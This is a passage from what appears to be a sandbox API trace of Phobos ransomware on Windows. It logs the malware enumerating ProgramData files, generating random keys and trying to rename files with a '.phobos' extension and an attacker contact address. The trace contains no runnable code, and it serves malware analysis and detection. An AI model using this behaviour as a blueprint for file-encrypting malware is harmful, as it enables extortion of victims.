hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.497] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.498] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=129745) returned 1 [0112.498] CloseHandle (hObject=0x2a0) returned 1 [0112.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png")) returned 0x20 [0112.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.498] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.519] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=2913) returned 1 [0112.519] CloseHandle (hObject=0x2a0) returned 1 [0112.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml")) returned 0x20 [0112.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.520] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.520] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=44488) returned 1 [0112.520] CloseHandle (hObject=0x2a0) returned 1 [0112.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png")) returned 0x20 [0112.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.521] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.521] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=28865) returned 1 [0112.521] CloseHandle (hObject=0x2a0) returned 1 [0112.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png")) returned 0x20 [0112.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.521] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0112.539] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=39379) returned 1 [0112.539] CloseHandle (hObject=0x2c0) returned 1 [0112.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png")) returned 0x20 [0112.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.540] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.540] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.540] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.542] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=28865) returned 1 [0112.542] CloseHandle (hObject=0x2b0) returned 1 [0112.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png")) returned 0x20 [0112.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.542] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.542] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.543] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.543] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=1334) returned 1 [0112.543] CloseHandle (hObject=0x2b0) returned 1 [0112.543] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml")) returned 0x20 [0112.543] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.544] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.544] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.544] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.545] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=1334) returned 1 [0112.545] CloseHandle (hObject=0x2b0) returned 1 [0112.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml")) returned 0x20 [0112.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.545] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.545] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.545] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.546] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=13427) returned 1 [0112.546] CloseHandle (hObject=0x2b0) returned 1 [0112.546] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml")) returned 0x20 [0112.546] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.546] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.546] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.546] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.547] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=1512) returned 1 [0112.547] CloseHandle (hObject=0x2b0) returned 1 [0112.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml")) returned 0x20 [0112.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.547] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.547] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.547] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.547] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=11364) returned 1 [0112.548] CloseHandle (hObject=0x2b0) returned 1 [0112.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml")) returned 0x20 [0112.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.548] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.548] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.548] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.549] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=262768) returned 1 [0112.549] CloseHandle (hObject=0x2b0) returned 1 [0112.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat")) returned 0x2020 [0112.550] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.550] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.550] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.550] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.551] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=4627413) returned 1 [0112.551] CloseHandle (hObject=0x2b0) returned 1 [0112.551] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat")) returned 0x2020 [0112.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0112.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat")) returned 0 [0112.552] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.552] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.552] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=8) returned 1 [0112.552] CloseHandle (hObject=0x2b0) returned 1 [0112.552] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat")) returned 0x2020 [0112.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.553] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.553] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.553] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 